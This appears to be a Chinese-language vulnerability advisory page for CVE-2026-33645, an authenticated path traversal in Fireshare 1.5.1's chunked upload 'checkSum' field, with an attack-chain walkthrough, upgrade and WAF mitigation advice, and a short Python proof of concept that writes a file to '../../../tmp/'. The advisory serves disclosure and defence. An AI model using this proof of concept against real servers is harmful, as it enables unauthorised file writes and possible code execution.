CVE-2026-33645 CVSS 7.1 高危

CVE-2026-33645 Fireshare认证路径遍历漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33645

漏洞类型

路径遍历

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fireshare

漏洞概述

Fireshare是一个自托管媒体和链接共享平台。在其1.5.1版本中，系统存在一个经过身份验证的路径遍历漏洞。该漏洞位于分块上传接口，由于未对用户输入的`checkSum`字段进行有效的净化或路径限制，攻击者可以通过构造恶意请求绕过上传目录限制。成功利用此漏洞允许攻击者在预期目录之外的任意位置（如容器/tmp目录）写入文件，这严重破坏了系统完整性，并可能被利用于后续的攻击活动。

技术细节

该漏洞的根源在于Fireshare处理分块上传请求时的不安全编码实践。在1.5.1版本中，服务器端代码直接使用HTTP请求中 multipart 字段的 `checkSum` 参数来构造文件系统路径，而未对其进行任何消毒处理（如过滤 `../` 字符）或路径范围验证。由于该接口需要认证（PR:L），攻击者首先需要拥有一个有效的低权限账户。随后，攻击者可以发送特制的POST请求至分块上传端点，并在 `checkSum` 字段中注入路径遍历序列。这使得文件可以被写入Fireshare进程用户有写权限的任意位置（例如 `/tmp` 或 Web 根目录）。这种任意文件写入能力可能导致配置文件被覆盖、恶意脚本上传，进而结合其他环境因素导致远程代码执行（RCE）。

攻击链分析

STEP 1

侦察与信息收集

攻击者识别目标运行的是Fireshare应用，并确认版本为1.5.1或更低。

STEP 2

获取认证凭证

攻击者注册或获取一个低权限账户，因为漏洞利用需要身份验证（PR:L）。

STEP 3

构造恶意请求

攻击者向分块上传端点发送特制的POST请求，在`checkSum`参数中注入路径遍历字符（如`../`）。

STEP 4

写入任意文件

服务器端未过滤该参数，导致文件被写入到系统其他可写目录（如`/tmp`），破坏完整性。

STEP 5

后续利用

攻击者利用写入的文件（如覆盖配置或上传脚本）进一步执行代码或提权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://localhost:5000/api/upload/chunk" # Example endpoint
auth_token = "VALID_LOW_PRIVILEGE_TOKEN_OR_COOKIE" # Requires authentication

# The vulnerable endpoint expects a multipart upload
# The 'checkSum' field is directly used in path construction without sanitization

files = {
    # File content to be written
    'file': ('payload.txt', b'Malicious content or webshell', 'text/plain'),
    # The vulnerable field: using path traversal to escape the upload directory
    'checkSum': (None, '../../../tmp/payload.txt')
}

headers = {
    "Authorization": f"Bearer {auth_token}"
}

try:
    response = requests.post(target_url, headers=headers, files=files)
    if response.status_code == 200:
        print("[+] PoC executed successfully. File likely written outside intended directory.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Fireshare <= 1.5.1

防御指南

临时缓解措施

建议管理员立即将Fireshare升级到1.5.2版本以修复此漏洞。如果无法立即升级，应严格限制对上传端点的网络访问，或通过Web应用防火墙（WAF）拦截包含路径遍历字符（如“../”）的请求。此外，应检查服务器关键目录（如/tmp）是否存在异常的新建文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表